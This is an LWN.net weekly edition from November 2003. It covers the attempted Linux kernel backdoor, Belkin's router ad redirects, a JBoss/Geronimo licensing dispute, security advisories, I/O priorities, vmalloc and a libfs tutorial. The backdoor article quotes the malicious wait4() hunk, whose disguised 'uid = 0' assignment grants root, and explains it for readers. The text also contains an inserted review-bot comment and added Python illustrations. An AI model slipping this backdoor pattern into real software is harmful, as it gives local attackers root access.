LWN.net Weekly Edition for November 13, 2003
The upcoming security fight
Security is an important issue. Software users have been bitten by enough security incidents now that they are beginning to really think about whether a system they are considering deploying is sufficiently secure or not. As a result, software vendors are beginning to feel some heat from their customers on security. Among other things, security concerns have led directly to two new initiatives from Microsoft: the payment of bounties on information leading to the arrest of virus authors, and (apparently) an upcoming publicity campaign which will try to demonstrate that Microsoft products have a better security record than Linux.
Strangely enough, neither of those efforts will make Windows more secure in any way. But they will raise the stakes with regard to security issues. We should expect that, in the future, Linux-related security problems will receive much more attention than they have in the past. If Microsoft is out to prove itself more secure than Linux, it certainly will not waste any PR opportunities resulting from Linux vulnerabilities.
There are many implications to note from an increased emphasis on the perceived security of software products. Both developers and users of free software will want to redouble their efforts to tighten up security. The free software community may be better at the creation and deployment of secure software than just about anybody else, but our record is still far from good enough.
There is nothing new in the statement above. But consider for a moment the recent attempt to insert a backdoor into the Linux kernel. There is no way of knowing who was responsible for that attack, but it is worth thinking about who might have benefitted from it. The attempted back door - which did not enable remote attacks - would have been more useful for publicity than for actual exploits. Somebody wanted to be able to say that a vulnerability had been successfully planted in the Linux kernel. Any company with an interest in attacking the security record of free software - and there is more than one such company - would have gotten great mileage out of this kind of demonstration. It is safe to assume that there will be other attempts to insert malicious code into free software releases; a high level of vigilance will be required to detect and defeat those attempts.
The public perception of the relative security of operating systems has become an issue that means real money to the companies involved. When free software starts to eat too far into its competitors' bottom line, those competitors can be expected to fight back. Not all of them will choose to fight fairly; a quick look at the SCO case will verify that fact. Without giving in to absolute paranoia, we should expect the debate around security issues to take on a harsher edge. Things could get interesting, but this is a fight we should win decisively by doing what we always do: developing the best software we can with our users' needs in mind.
An attempt to backdoor the kernel
The mainline 2.4 and 2.6.0-test kernels are both currently maintained in BitKeeper repositories. As a service for those who, for whatever reason, are unable or unwilling to use BitKeeper, however, the folks at BitMover have set up a separate CVS repository. That repository contains the current code and the full revision history. It is not, however, the place where new changes are committed. So, when somebody managed to push some changes directly into CVS, Larry McVoy noticed quickly.
Over the years, people have had numerous things to say about BitKeeper and the people behind it. Nobody, however, has accused them of being insufficiently careful. Every change in the CVS repository includes backlink information tying it to the equivalent BitKeeper changesets. The changes in question lacked that information, and thus stood out immediately.
An attempt to make a change in this way is suspicious, to say the least, so there was a lot of interest in what the attempted change was. The actual patch confirmed all suspicions; the relevant code was:
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) + retval = -EINVAL;
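Review bot: the second operand of the && in the added if line, (current->uid = 0), uses a single = and is therefore an assignment, not a comparison. Whenever options equals __WCLONE|__WALL it stores 0 into current->uid, and because the assigned value is 0 the condition is always false, so the retval = -EINVAL line below it can never execute. An error check here would be written current->uid == 0; as submitted, the hunk changes the caller's uid as a side effect of a test and should be rejected.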
It looks much like a standard error check, until you notice that the code is not testing current->uid - it is, instead, setting it to zero. A program which called wait4() with the given flags set would, thereafter, be running as root. This is, in other words, a classic back door.
The resulting vulnerability, had it ever made it to a deployed system, would have been a locally-exploitable hole. Some sites have said that the hole would have been susceptible to remote exploits, but that is not the case. An attacker would need to be able to run a program on the target system first.
But this attack never had any chance of corrupting the mainline kernel. The CVS repository is generated from BitKeeper; it is not a path for patches to get into the BitKeeper repositories. So the code in question could only affect users who were working from the CVS repository. Kernels used by distributors probably do not come from that repository, and, as this incident has shown, illicit code can only remain there for so long before being detected.
As it turns out, a successful attack on the public BitKeeper repositories would not be a whole lot more effective. By its nature, BitKeeper works with many copies of the repository; it is good for BitKeeper users that disk space is cheap. The public 2.6 repository reflects all of Linus's work, but it is not his repository. When Linus applies a set of patches, he has to explicitly "push" his private repository to the public server before the rest of the world sees it.
BitKeeper takes a very paranoid view of its data. Checksums are applied all over the place, and a push from one repository to another can't be done if the receiving repository has unknown changesets in it. So, if somebody were to sneak something into the public repository, Linus would notice it the next time he attempted a push of his own. At that point the red alert could be sounded, and the only people affected would be those who had pulled development kernels directly from the repository.
So the only way to get a back door into the kernel source - and to have it be widely distributed - would be to get Linus or one of his top-tier lieutenants to accept it directly. That would be a challenge, since these people do actually look over code before accepting it. It is not entirely impossible, however; a forged message to Linus appearing to contain a patch from a trusted contributor might just be accepted. The development process is reasonably secure, but not perfect.
For this reason, this episode has renewed a push to incorporate digital signature checking into BitKeeper. If the source management system checked such signatures automatically, the most obvious forgeries would be detected before they were merged. Larry McVoy has indicated that he is willing to build such a feature into the free (beer) version of BitKeeper. Whether the key kernel hackers would be willing to start signing all of their patches is another question. The pain of having to sign patches could well be far less than the pain of dealing with a widely distributed backdoor in the kernel, however.
The Belkin router fiasco
It must have seemed like a good idea to some marketing person at Belkin. This company offers a "parental control" feature in its LAN router products which, upon payment of a subscription fee, allows control over which sites can be accessed. It would be nice (from Belkin's point of view) to be sure that all customers are aware of the opportunity to buy this service. So why not just redirect a random web connection every eight hours and have it display an ad for the parental control service rather than the page the user thought they were going to see?
Belkin thought this "feature" was not a particularly big deal. After all, it can be turned off by changing a setting in the router configuration. Or, if the user hits the "no thanks" button, a system owned by Belkin will connect to the router over the net and turn off the feature for them. Unless, of course, the router sits behind a firewall that might look askance at connections to internal routers from the wider Internet.
This sort of episode demonstrates, again, why it is important to have our gadgets powered by free software. Nobody should have to put up with a router hijacking their HTTP connections to display advertisements at them. Few of us want a router whose configuration can be silently changed via a connection from the outside. And many of us would sure like to know what other interesting "features" might have been included with such a product. But, without the source, there is very little to be done. Bad (or malicious) features cannot be fixed, and nobody can audit the code for any other surprises that may be lurking within.
In the absence of source, there is only one feasible way to fix a problem like Belkin's advertising feature: embarrass the manufacturer on the net until they make a fix available. In this case, that approach appears to have worked; Belkin has announced that it will be releasing a firmware update which removes the redirect feature. But we may never know what other features Belkin will have worked into its products. Until our gadgets are powered by free software, we will never really know what our appliances are doing and we will lack the power to fix them.
Geronimo accused of LGPL violations
Geronimo is a project being run under the Apache Software Foundation; it is an attempt to create a free J2EE implementation under the Apache license. As such, it is a direct competitor to JBoss, a commercially-supported project which licenses its code under the Lesser GPL. The JBoss Group has evidently been sufficiently concerned about Geronimo to be watching the project and digging through its code repository. They didn't like what they found; on November 10, the Apache Software Foundation received a letter (PDF format) from JBoss's lawyers alleging that code had been copied from JBoss into Geronimo.
Copying of code between free software projects is not always a concern; indeed, the freedom to do so is one of the things that makes free software great. This copying cannot happen, however, if the two projects do not have compatible licenses. The JBoss code is licensed under the LGPL; creating a derived product of that code under the Apache license is not an action that the LGPL allows. So, if this copying has actually occurred, and the person contributing the code to Geronimo did not have the right to do so (by actually owning the copyright on that code, for example), the JBoss Group may have a real point.
It would have been nice to resolve this issue without bringing in the lawyers. Even so, the tone of the letter distinguishes the JBoss group from other companies which have been claiming that their code was copied. The letter proceeds on the assumption that any such copying was not done intentionally, and it provides some actual code examples. The Geronimo project has responded accordingly; if there is any LGPL code in Geronimo, they don't want it there and they will take the appropriate steps to get rid of it.
Thus far, however, the Geronimo developers seem unconvinced by the JBoss Group's claims. An examination of the examples provided by JBoss suggests that the code in question may have a right to be there. Indeed, some of it appears to be derived from other Apache-licensed code which somehow lost its copyright notices on its way into JBoss. One of the code examples is no longer in the current Geronimo code base, and has not been for a couple of months.
This is a situation which bears watching. The free software community truly does not need a legal battle between two of its projects. It does appear that the right things are being done, however; with luck, this situation will be resolved in a friendly and professional manner, and without further involvement of lawyers.
Security
Brief items
Security Certification - The Open Source Way
An open approach was used in the first ever security certification for Linux, as befits the open source nature of the operating system. IBM and SuSE teamed up to certify SuSE Linux Enterprise Server 8 (SLES 8) on IBM eServer xSeries hardware and achieved Common Criteria Evaluation Assurance Level 2+ (EAL2+) in July. Much of the documentation that was done to accomplish this is available from the SuSE and IBM Linux Technology Center web sites.
"This very open approach is unusual for a certification," according to Klaus Weidner, senior IT security consultant for atsec, the German firm responsible for the evaluation. "The overall effort for another distribution is significantly lower if they re-use the material that has been released to the Open Source community from the evaluation of SLES 8," he said. The material that has been released includes a high-level design, a security guide, the security target, test plans, and the certification report. In addition, bugs found during the process have been fixed and the resulting patches fed back to the developers for inclusion in upcoming releases.
Common Criteria security certification consists of two elements: the "security target" (or "protection profile") that specifies the security features of the product to be evaluated and the "assurance level" which provides a level of confidence that the security functions perform as documented. For the EAL2 certification, the security target was created by IBM and SuSE. The evaluation process looked at SuSE's "configuration management, acceptance procedures and development security," Weidner said, and SuSE was "found to meet and exceed all requirements for this evaluation." A few bugs were found in the testing process, particularly in PAM authentication, and they were fixed and funneled back to the development community.
Looking forward, the evaluation and testing for an EAL3 certification is currently under way using the Controlled Access Protection Profile (PDF format) (CAPP), which is a standardized security target created by the NSA. CAPP is the target that was used by Microsoft to achieve an EAL4 certification for Windows 2000. These certifications are widely seen by companies and government agencies as a seal of approval for the security functions of a product.
The main areas that need work for the EAL3 certification are adding an auditing subsystem and documenting what Weidner called "security-relevant subsystem interfaces". As part of that process, any undocumented Linux system calls need to have man pages written for them; the resulting pages will, of course, be provided back to the Linux community. The audit subsystem has been completed and is undergoing tests; the kernel portion is based on the systrace patch along with a set of user-space utilities that were developed by IBM and SuSE. These too will be open source.
EAL4 certification (should IBM and SuSE take that step) will require even more documentation, including internal interfaces inside the kernel. "Kernel hackers may be happy with using the source code as a reference, but EAL4 requires a descriptive low-level design document," Weidner said. This effort would be huge and it is not known whether it will be done, but it would obviously serve as a great reference to kernel internals.
One of the bigger questions surrounding these certifications is what they really mean for the security of the system. Unfortunately, the answer seems to be: not much. Professor Jonathan Shapiro of Johns Hopkins University has an analysis of the Windows 2000 EAL4 certification and much of what he says can be applied to the EAL2 (and presumably upcoming EAL3) certification of SLES 8. In summary the CAPP (and the target used for EAL2) both define away most of the "real world" security problems that operating systems face. From the CAPP document:
which Shapiro translates into:
While CAPP is the "standard", it really does not provide requirements that would make a system secure from the biggest security threats that exist today. It seems somewhat unlikely that the cracker community is particularly well funded, but they certainly are hostile, clever, and persistent. Given the volume of exploits against the CAPP/EAL4 certified Windows 2000, it seems clear that certification is mostly a marketing bullet point to make purchasers more comfortable without actually providing a secure system.
Where are the Fedora updates?
Some users of the Fedora Core 1 release have noted that it contains at least one package (ethereal) with a known vulnerability and have asked when security updates will become available. The response from Red Hat is:
The first update (for EPIC) has found its way to the download directory, and the ethereal update is in the testing directory. Announcements will go to the fedora-announce list soon. Fedora Core is a new distribution, and some of the mechanisms are still going into place, but it should all be there before too long.
New vulnerabilities
conquest: buffer overflow
| Package(s): | conquest | CVE #(s): | CAN-2003-0933 |
| Created: | November 10, 2003 | Updated: | November 13, 2003 |
| Description: | Steve Kemp discovered a buffer overflow in the environment variable handling of conquest, a curses based, real-time, multi-player space warfare game, which could lead a local attacker to gain unauthorized access to the group conquest. |
epic4: buffer overflow
| Package(s): | epic4 | CVE #(s): | CAN-2003-0328 |
| Created: | November 10, 2003 | Updated: | November 25, 2003 |
| Description: | Jeremy Nelson discovered a remotely exploitable buffer overflow in EPIC4, a popular client for Internet Relay Chat (IRC). A malicious server could craft a reply which triggers the client to allocate a negative amount of memory. This could lead to a denial of service if the client only crashes, but may also lead to execution of arbitrary code under the user id of the chatting user. |
ethereal: multiple remote and local vulnerabilities
| Package(s): | ethereal | CVE #(s): | CAN-2003-0925 CAN-2003-0926 CAN-2003-0927 |
| Created: | November 10, 2003 | Updated: | December 17, 2003 |
| Description: | Multiple vulnerabilities have been found in ethereal versions below 0.9.16. Remote attackers can craft packets, and local users can build corrupt trace files, resulting in denial of service and remote code execution. |
hylafax: remote code execution
| Package(s): | hylafax | CVE #(s): | CAN-2003-0886 |
| Created: | November 10, 2003 | Updated: | November 20, 2003 |
| Description: | Hylafax is an Open Source fax server which allows sharing of fax equipment among computers by offering its service to clients by a protocol similar to FTP. The SuSE Security Team found a format bug condition during a code review of the hfaxd server. It allows remote attackers to execute arbitrary code as root. However, the bug can not be triggered in hylafax's default configuration. The "capi4hylafax" packages also need to be updated as a dependency where they are available. Upgrading to version 4.1.8 fixes the problem; see this advisory for details. |
mpg123: heap overflow
| Package(s): | mpg123 | CVE #(s): | CAN-2003-0865 |
| Created: | November 12, 2003 | Updated: | February 19, 2004 |
| Description: | Versions of mpg123 through 0.59s contain a heap overflow which may be exploited remotely (by a hostile server). See this advisory for details. |
omega-rpg: buffer overflow
| Package(s): | omega-rpg | CVE #(s): | CAN-2003-0932 |
| Created: | November 11, 2003 | Updated: | November 13, 2003 |
| Description: | Steve Kemp discovered a buffer overflow in the commandline and environment variable handling of omega-rpg, a text-based rogue-style game of dungeon exploration, which could lead a local attacker to gain unauthorized access to the group games. |
Resources
Secure programmer: Validating input (IBM developerWorks)
David A. Wheeler writes about validating input in this installment of the Secure Programmer, on IBM developerWorks. "One of the biggest mistakes developers of secure programs make is to try to check for 'illegal' data values. It's a mistake because attackers are quite clever; they can often think of yet another dangerous data value. Instead, determine what is legal, check if the data matches that definition, and reject anything that doesn't match that definition. For security it's best to be extremely conservative to start with, and allow just the data that you know is legal. After all, if you're too restrictive, users will quickly report that the program won't allow legitimate data to be entered. On the other hand, if you're too permissive, you may not find that out until after your program has been subverted."
Page editor: Jonathan Corbet
Kernel development
Brief items
Kernel release status
The current development kernel remains 2.6.0-test9, as it has been since October 25. The slow, steady accumulation of patches (all relatively important fixes) in Linus's BitKeeper repository continues, however. One of those patches disables the IDE tagged command queueing feature, since it does not look like that code will be sufficiently stable by the 2.6.0 release.
The current stable kernel is 2.4.22; Marcelo announced the first 2.4.23 release candidate on November 10. The time has come for testing of this release to help ensure a solid 2.4.23 kernel in the near future.
Kernel development news
Disk I/O priorities
Linux has long had a priority mechanism which controls access to the processor(s). Other system resources, however, are not so easily managed. Often, the real performance bottleneck is not the processor, but some other resource, such as I/O bandwidth to a disk drive. If disk I/O is the real limiting factor, even a very low-priority process can, by creating many I/O requests, strongly affect the performance of higher-priority processes on the system.
Jens Axboe has now taken a stab at the I/O priority issue with a new version of his "completely fair queueing" (CFQ) I/O scheduler. We first mentioned the CFQ scheduler back in February; it works by creating a separate request queue for every process issuing disk I/O and taking an equal number of requests from each one of them. In this way, it seeks to distribute the available I/O bandwidth equally across processes in the system and produce "completely fair" results.
The new version gives each process an I/O priority, which is a number between zero and 20 (inclusive). At the bottom end, disk I/O is only allowed when the disk would otherwise be idle. A priority of 20, instead, is the "real-time" level; all requests at that level are satisfied before any other requests are considered. The levels in between are for normal processes; by default, the I/O priority is set to 10. A pair of system calls has been added to adjust the I/O priority of a process, though the form of those calls is likely to change in the future.
Internally, the per-process request queues have now been divided into an array of 21 lists, one for each priority level. There is also a dispatch queue, which contains the requests which have been selected for processing next. A separate dispatch queue is still needed to allow some amount of request ordering and merging.
When the time comes to fill the dispatch queue, the new scheduler starts with the real-time queue. If requests are waiting there, they go straight into the dispatch queue and the process is complete. There is also an anticipatory scheduling feature for real-time requests: when the last real-time request is processed, the scheduler will wait a short period (10ms, currently) to see if any more real-time requests show up before opening the floodgates for everybody else.
In the absence of real-time requests, the code passes through each priority level, taking a decreasing number of requests from each one. Each process gets to contribute one request at a time to the dispatch queue until the quota for its priority level (expressed in both the number of requests and the number of sectors to transfer) has been reached. Requests are only taken from the idle priority queue if no other requests have been dispatched for a configurable period of time (default 100ms).
With the new CFQ scheduler, an I/O request may not be serviced even after it makes it into the dispatch queue. If a new request with real-time priority shows up, all lower-priority requests are yanked back out of the dispatch queue and have to go through the whole process again. Similarly, any non-idle requests will cause any pending idle-priority requests to lose their place in the dispatch queue.
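The dispatch rules from the preceding paragraphs as a user-space model in Python, added here as an illustration and not taken from Jens Axboe's patch. Assumptions: the per-level quota (here the level number, shared round-robin by that level's processes) is invented because the article gives no figures, the sector quota and the 10ms real-time anticipation wait are left out, and the process names and request labels are constructed.

```python
from collections import deque

IDLE, DEFAULT, REALTIME = 0, 10, 20   # levels named in the article
IDLE_GRACE_MS = 100                   # article: default wait before idle I/O runs


def quota(level):
    """Requests a level may dispatch per pass. Assumed: the article says only
    that the number decreases with priority, so the level number is used."""
    return level


class PrioScheduler:
    def __init__(self):
        # One dict per level (0..20): pid -> that process's pending requests.
        self.levels = [dict() for _ in range(REALTIME + 1)]
        self.dispatch = []        # (level, pid, request) chosen to run next
        self.last_busy_ms = 0     # last time non-idle work was dispatched

    def add(self, pid, level, request):
        self.levels[level].setdefault(pid, deque()).append(request)
        if level == REALTIME:     # real-time arrival evicts everything below it
            self._yank(lambda lv: lv < REALTIME)
        elif level > IDLE:        # any non-idle arrival evicts pending idle I/O
            self._yank(lambda lv: lv == IDLE)

    def _yank(self, is_victim):
        """Return matching dispatch entries to the front of their own queues."""
        for level, pid, request in reversed(self.dispatch):
            if is_victim(level):
                self.levels[level].setdefault(pid, deque()).appendleft(request)
        self.dispatch = [e for e in self.dispatch if not is_victim(e[0])]

    def _take(self, level, limit):
        """Move up to `limit` requests (None = all) round-robin, one per process."""
        queues, taken = self.levels[level], 0
        while queues and (limit is None or taken < limit):
            for pid in list(queues):
                if limit is not None and taken >= limit:
                    break
                self.dispatch.append((level, pid, queues[pid].popleft()))
                taken += 1
                if not queues[pid]:
                    del queues[pid]
        return taken

    def fill(self, now_ms):
        """Refill the dispatch queue; returns the requests now queued."""
        if self._take(REALTIME, None):       # real-time work goes first, alone
            self.last_busy_ms = now_ms
        else:
            took = sum(self._take(lv, quota(lv))
                       for lv in range(REALTIME - 1, IDLE, -1))
            if took:
                self.last_busy_ms = now_ms
            elif now_ms - self.last_busy_ms >= IDLE_GRACE_MS:
                self._take(IDLE, 1)          # disk has been quiet long enough
        return [request for _, _, request in self.dispatch]


def demo():
    """Constructed workload: normal and low-priority I/O, then a real-time arrival."""
    s = PrioScheduler()
    s.add("backup", IDLE, "b1")
    for pid, level, req in [("editor", 10, "e1"), ("editor", 10, "e2"),
                            ("build", 10, "c1"), ("low", 2, "l1"),
                            ("low", 2, "l2"), ("low", 2, "l3")]:
        s.add(pid, level, req)
    first = s.fill(now_ms=0)
    s.add("db", REALTIME, "r1")              # preempts what was just dispatched
    second = s.fill(now_ms=5)
    return first, second
```

In the demo the level-2 process gets only two of its three requests dispatched in the first pass, and the real-time arrival pushes all five dispatched requests back onto their per-process queues.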
The new scheduler appears to be uncontroversial - though it clearly is not a critical fix and thus won't go into 2.6.0. The real debate appears to be over how I/O priorities should be controlled. Some commenters would like to see the nice() system call apply to I/O priorities as well as CPU priorities. That, however, would be a fairly fundamental ABI change, and is unlikely to happen.
On the proper use of vmalloc()
As those who have looked at kernel programming at all have noticed, there are two basic memory allocation modes in Linux. One of those, which comes down to get_free_pages() in the end, allocates one or more physically contiguous pages which are in the kernel's main virtual address space (except for high memory pages, of course). Most other memory allocation mechanisms, including the slab allocator and kmalloc(), are built on top of get_free_pages(). In the other corner is vmalloc(), which allocates virtually contiguous (but physically dispersed) pages in a separate virtual address space. vmalloc() is relatively slow, but it can perform large allocations that look contiguous to the kernel. It is thus used, for example, to allocate space for code from loadable modules.
Erik Jacobson recently found the limits of kmalloc() while querying /proc/interrupts on a very large system. The code implementing /proc/interrupts attempts to allocate a buffer for its output; the size of that buffer is dependent on the number of processors on the system. On big systems, the required buffer is large and the allocation fails. So Erik submitted a fix which uses vmalloc() to allocate the memory instead.
Linus didn't like it. He pointed out that the seq_file interface should be used instead. Indeed, /proc/interrupts fits naturally into the sort of output seq_file is intended to create, and doing things that way can eliminate the need to allocate a large buffer at all. But Linus also clarified his thoughts on when vmalloc() should be used:
That should be sufficiently clear for most readers; perhaps an entry on vmalloc() needs to be added to the coding style document.
There are a few reasons for this stance. Every call to vmalloc() requires page table tweaking and translation buffer flushes, so it will be slow. Space from vmalloc() lies outside of the regular kernel range, which is (on most architectures) covered by a single, large page table entry, so extra translation buffer slots are required to access it. And, on many architectures, the amount of virtual space set aside for vmalloc() is relatively small. For all of these reasons, use of vmalloc() is discouraged, and patches containing vmalloc() calls are increasingly unlikely to make it into the kernel.
Accessing the BK2CVS repository
The BK2CVS repository (which contains a CVS copy of Linus's public BitKeeper repository) has been offline for a bit due to the backdoor insertion attempt. When it returns, it may come back without the "pserver" access mode which is normally used for anonymous CVS updates. Pserver is convenient, but it increases the security exposure of the CVS repository and it is not supported by the kernel.org mirror system. Given that a very small number of people have been using that access mode, there seems to be a consensus that it can just go away.
People do use the CVS repository, however. It just turns out that many of them have noted that it is faster to use rsync to update the entire repository from a kernel.org mirror than to update it through CVS. The rsync approach looks like the way to go in the future, but it does have one potential difficulty: if the repository is updated in the middle of an rsync, the person downloading the copy might get an inconsistent tree. Kernel hackers have to deal with enough race conditions as it is; they would prefer not to encounter them while trying to update their copy of the mainline kernel repository.
The solution that is likely to be implemented involves the creation of a couple of sequence files. One is fetched before doing the big repository rsync, and the other afterward. If the sequence numbers in the two files do not match, the rsync operation raced with an update of the repository and needs to be retried. This is, of course, an Internet implementation of the seqlock algorithm used within the kernel. Look for an update script to show up soon.
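The sequence-file check described above, as an added Python example (not the update script the article anticipates, and not kernel.org code). The file names seq.start and seq.end, the mirror layout with the repository under tree/, and the order in which the reader fetches the two files are assumptions; the in-memory mirror is constructed so that a publisher update lands in the middle of the first sync.

```python
import subprocess
import time
from pathlib import Path

# Assumed file names; the article does not say what the sequence files are called.
SEQ_START = "seq.start"  # publisher bumps this BEFORE it starts changing the tree
SEQ_END = "seq.end"      # publisher bumps this AFTER the tree is complete


def parse_seq(text):
    """A sequence file holds one non-negative integer; reject anything else."""
    value = text.strip()
    if not (value.isascii() and value.isdigit()):
        raise ValueError(f"malformed sequence file: {text!r}")
    return int(value)


def consistent_sync(read_seq, sync_tree, max_tries=5, pause=0.0):
    """Repeat sync_tree() until it did not overlap a publisher update.

    The reader takes the files in the opposite order to the writer: SEQ_END
    before the copy, SEQ_START after it. An update that was in progress at the
    start, or began during the copy, then shows up as a mismatch.
    Returns (sequence_number, attempts_used).
    """
    for attempt in range(1, max_tries + 1):
        before = parse_seq(read_seq(SEQ_END))
        sync_tree()
        after = parse_seq(read_seq(SEQ_START))
        if before == after:
            return before, attempt
        time.sleep(pause)  # give the publisher time to finish before retrying
    raise RuntimeError(f"tree kept changing during {max_tries} sync attempts")


def rsync_transport(mirror, dest):
    """Real transport: (read_seq, sync_tree) callables that shell out to rsync.

    `mirror` is an rsync URL ending in '/' (assumed layout: tree/ plus the
    two sequence files at the top level).
    """
    dest = Path(dest)
    dest.mkdir(parents=True, exist_ok=True)

    def read_seq(name):
        local = dest / name
        subprocess.run(["rsync", "-q", mirror + name, str(local)], check=True)
        return local.read_text()

    def sync_tree():
        subprocess.run(["rsync", "-a", "--delete", "-q",
                        mirror + "tree/", str(dest / "tree")], check=True)

    return read_seq, sync_tree


class SimulatedMirror:
    """In-memory mirror (constructed) whose publisher updates mid-sync once."""

    def __init__(self):
        self.seq = {SEQ_START: 7, SEQ_END: 7}
        self.files = {"Makefile": "rev 7", "kernel/exit.c": "rev 7"}
        self.local = {}
        self.race_pending = True

    def read_seq(self, name):
        return f"{self.seq[name]}\n"

    def publish(self):
        new = self.seq[SEQ_START] + 1
        self.seq[SEQ_START] = new            # 1. announce the update
        for path in self.files:              # 2. change the tree
            self.files[path] = f"rev {new}"
        self.seq[SEQ_END] = new              # 3. declare it complete

    def sync_tree(self):
        for i, path in enumerate(sorted(self.files)):
            if self.race_pending and i == 1:
                self.race_pending = False
                self.publish()               # update lands between two files
            self.local[path] = self.files[path]


def demo():
    """First pass copies a mixed rev 7 / rev 8 tree; the check forces a retry."""
    mirror = SimulatedMirror()
    seq, attempts = consistent_sync(mirror.read_seq, mirror.sync_tree)
    return seq, attempts, dict(mirror.local)
```

Fetching the files in the other order (start file first, end file last) would miss an update that was already under way when the sync began and finished before it ended, which is why the reader mirrors the writer's order in reverse.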
Driver porting
News from the driver porting series
The LWN Porting Drivers to 2.6 series is currently going through an extensive review. Since the first set of articles came out last February, quite a few things have changed and a number of the articles have become a little stale. Trying to keep up with the kernel is like that... The updating process is a little over halfway complete as of this writing; we should be able to finish within a week or so.
Most of the articles require only small changes at most. The "creating virtual filesystems with libfs" article, however, has been significantly expanded, thanks to the addition of simple_fill_super(). For those who are curious, the newer, bigger version of the article appears below.
Creating Linux virtual filesystems
| This article is part of the LWN Porting Drivers to 2.6 series. |
Linus and numerous other kernel developers dislike the ioctl() system call, seeing it as an uncontrolled way of adding new system calls to the kernel. Putting new files into /proc is also discouraged, since that area is seen as being a bit of a mess. Developers who populate their code with ioctl() implementations or /proc files are often encouraged to create a standalone virtual filesystem instead. Filesystems make the interface explicit and visible in user space; they also make it easier to write scripts which perform administrative functions. But the writing of a Linux filesystem can be an intimidating task. A developer who has spent some time just getting up to speed on the driver interface can be forgiven for balking at having to learn the VFS API as well.
The 2.6 kernel contains a set of routines called "libfs" which is designed to make the task of writing virtual filesystems easier. libfs handles many of the mundane tasks of implementing the Linux filesystem API, allowing non-filesystem developers to concentrate (mostly) on the specific functionality they want to provide. What it lacks, however, is documentation. This article is an attempt to fill in that gap a little bit.
The task we will undertake is not particularly ambitious: export a simple filesystem (of type "lwnfs") full of counter files. Reading one of these files yields the current value of the counter, which is then incremented. This leads to the following sort of exciting interaction:
# cat /lwnfs/counter
0
# cat /lwnfs/counter
1
# ...
Your author was able to amuse himself well into the thousands this way; some users may tire of this game sooner, however. The impatient can get to higher values more quickly by writing to the counter file:
# echo 1000 > /lwnfs/counter
# cat /lwnfs/counter
1000
#
OK, so the Linux distributors will probably not get too excited about advertising the new "lwnfs" capability. But it works as a way of showing how to create virtual filesystems. For those who are interested, the full source is available.
Initialization and superblock setup
So let's get started. A loadable module which implements a filesystem must, at load time, register that filesystem with the VFS layer. The lwnfs module initialization code is simple:
static int __init lfs_init(void)
{
    return register_filesystem(&lfs_type);
}
module_init(lfs_init);
The lfs_type argument is a structure which is set up as follows:
static struct file_system_type lfs_type = {
    .owner   = THIS_MODULE,
    .name    = "lwnfs",
    .get_sb  = lfs_get_super,
    .kill_sb = kill_litter_super,
};
This is the basic data structure which describes a filesystem type to the kernel; it is declared in <linux/fs.h>. The owner field is used to manage the module's reference count, preventing unloading of the module while the filesystem code is in use. The name is what eventually ends up on a mount command line in user space. Then there are two functions for managing the filesystem's superblock - the root of the filesystem data structure. kill_litter_super() is a generic function provided by the VFS; it simply cleans up all of the in-core structures when the filesystem is unmounted; authors of simple virtual filesystems need not worry about this aspect of things. (It is necessary to unregister the filesystem at unload time, of course; see the source for the lwnfs exit function).
In many cases, the creation of the superblock must be done by the filesystem programmer -- but see the "a simpler way" section below. This task involves a bit of boilerplate code. In this case, lfs_get_super() hands off the task as follows:
static struct super_block *lfs_get_super(struct file_system_type *fst,
        int flags, const char *devname, void *data)
{
    return get_sb_single(fst, flags, data, lfs_fill_super);
}
Once again, get_sb_single() is generic code which handles much of the superblock creation task. But it will call lfs_fill_super(), which performs setup specific to our particular little filesystem. Its prototype is:
static int lfs_fill_super (struct super_block *sb,
        void *data, int silent);
The in-construction superblock is passed in, along with a couple of other arguments that we can ignore. We do have to fill in some of the superblock fields, though. The code starts out like this:
    sb->s_blocksize = PAGE_CACHE_SIZE;
    sb->s_blocksize_bits = PAGE_CACHE_SHIFT;
    sb->s_magic = LFS_MAGIC;
    sb->s_op = &lfs_s_ops;
Most virtual filesystem implementations have something that looks like this; it's just setting up the block size of the filesystem, a "magic number" to recognize superblocks by, and the superblock operations. These operations need not be written for a simple virtual filesystem - libfs has the stuff that is needed. So lfs_s_ops is defined (at the top file level) as:
static struct super_operations lfs_s_ops = {
    .statfs     = simple_statfs,
    .drop_inode = generic_delete_inode,
};
Creating the root directory
Getting back into lfs_fill_super(), our big remaining task is to create and populate the root directory for our new filesystem. The first step is to create the inode for the directory:
    root = lfs_make_inode(sb, S_IFDIR | 0755);
    if (! root)
        goto out;
    root->i_op = &simple_dir_inode_operations;
    root->i_fop = &simple_dir_operations;
lfs_make_inode() is a boilerplate function that we will look at eventually; for now, just assume that it returns a new, initialized inode that we can use. It needs the superblock and a mode argument, which is just like the mode value returned by the stat() system call. Since we passed S_IFDIR, the returned inode will describe a directory. The file and directory operations that we assign to this inode are, again, taken from libfs.
This directory inode must be put into the directory cache (by way of a "dentry" structure) so that the VFS can find it; that is done as follows:
    root_dentry = d_alloc_root(root);
    if (! root_dentry)
        goto out_iput;
    sb->s_root = root_dentry;
Creating files
The superblock now has a fully initialized root directory. All of the actual directory operations will be handled by libfs and the VFS layer, so life is easy. What libfs cannot do, however, is actually put anything of interest into that root directory – that's our job. So the final thing that lfs_fill_super() does before returning is to call:
lfs_create_files(sb, root_dentry);
In our sample module, lfs_create_files() creates one counter file in the root directory of the filesystem, and another in a subdirectory. We'll look mostly at the root-level file. The counters are implemented as atomic_t variables; our top-level counter (called, with great imagination, "counter") is set up as follows:
static atomic_t counter;

static void lfs_create_files (struct super_block *sb,
        struct dentry *root)
{
    /* ... */
    atomic_set(&counter, 0);
    lfs_create_file(sb, root, "counter", &counter);
    /* ... */
}
lfs_create_file does the real work of making a file in a directory. It has been made about as simple as possible, but there are still a few steps to be performed. The function starts out as:
static struct dentry *lfs_create_file (struct super_block *sb,
        struct dentry *dir, const char *name,
        atomic_t *counter)
{
    struct dentry *dentry;
    struct inode *inode;
    struct qstr qname;
Arguments include the usual superblock structure, and dir, the dentry for the directory that will contain this file. In this case, dir will be the root directory we created before, but it could be any directory within the filesystem.
Our first task is to create a directory entry for the new file:
    qname.name = name;
    qname.len = strlen (name);
    qname.hash = full_name_hash(name, qname.len);
    dentry = d_alloc(dir, &qname);
The setting up of qname just hashes the file name so that it can be found quickly in the dentry cache. Once that's done, we create the entry within our parent dir. The file also needs an inode, which we create as follows:
    inode = lfs_make_inode(sb, S_IFREG | 0644);
    if (! inode)
        goto out_dput;
    inode->i_fop = &lfs_file_ops;
    inode->u.generic_ip = counter;
Once again, we call lfs_make_inode (which we will look at shortly, honest), but this time we use it to create a regular file. The key to the creation of special-purpose files in virtual filesystems is to be found in the other two assignments:
